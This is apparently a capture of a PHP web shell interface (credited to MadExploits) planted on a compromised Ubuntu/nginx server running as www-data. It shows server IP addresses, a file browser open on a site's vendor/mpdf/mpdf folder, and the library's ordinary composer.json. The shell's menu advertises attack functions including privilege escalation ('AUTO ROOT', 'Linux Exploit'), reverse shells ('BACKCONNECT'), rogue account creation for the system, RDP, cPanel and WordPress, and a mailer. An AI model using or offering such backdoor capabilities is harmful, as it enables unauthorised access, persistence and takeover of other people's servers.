Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
api.lmsschool /
vendor /
mpdf /
mpdf /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
data
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
ttfonts
[ DIR ]
drwxr-xr-x
.gitignore
23
B
-rw-r--r--
.travis.yml
700
B
-rw-r--r--
CHANGELOG.md
35.97
KB
-rw-r--r--
CREDITS.txt
4.72
KB
-rw-r--r--
LICENSE.txt
14.86
KB
-rw-r--r--
README.md
4.45
KB
-rw-r--r--
composer.json
1.72
KB
-rw-r--r--
phpunit.xml
435
B
-rw-r--r--
ruleset.xml
1.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "mpdf/mpdf", "type": "library", "description": "PHP library generating PDF files from UTF-8 encoded HTML", "keywords": ["php", "pdf", "utf-8"], "homepage": "https://mpdf.github.io", "license": ["GPL-2.0-only"], "authors": [ { "name": "Matěj Humpál", "role": "Developer, maintainer" }, { "name": "Ian Back", "role": "Developer (retired)" } ], "support": { "issues": "https://github.com/mpdf/mpdf/issues", "source": "https://github.com/mpdf/mpdf", "docs": "http://mpdf.github.io" }, "require": { "php": "^5.6 || ~7.0.0 || ~7.1.0 || ~7.2.0 || ~7.3.0 || ~7.4.0", "ext-gd": "*", "ext-mbstring": "*", "psr/log": "^1.0", "setasign/fpdi": "^2.1", "paragonie/random_compat": "^1.4|^2.0|9.99.99", "myclabs/deep-copy": "^1.7" }, "require-dev": { "phpunit/phpunit": "^5.0", "mockery/mockery": "^0.9.5", "squizlabs/php_codesniffer": "^3.5.0", "tracy/tracy": "^2.4", "mpdf/qrcode": "^1.0.0" }, "suggest": { "ext-bcmath": "Needed for generation of some types of barcodes", "ext-zlib": "Needed for compression of embedded resources, such as fonts", "ext-xml": "Needed mainly for SVG manipulation" }, "autoload": { "psr-4": { "Mpdf\\": "src/" } }, "autoload-dev": { "psr-4": { "Mpdf\\": "tests/Mpdf" }, "files": [ "src/functions-dev.php" ] }, "scripts": { "post-install-cmd": [ "php -r \"chmod('./tmp', 0777);\"" ], "cs": "@php vendor/bin/phpcs -v --report-width=160 --standard=ruleset.xml --severity=1 --warning-severity=0 --extensions=php src utils tests", "test": "@php vendor/bin/phpunit", "coverage": "@php vendor/bin/phpunit --coverage-text" }, "extra": { "branch-alias": { "dev-development": "7.x-dev" } } }
Close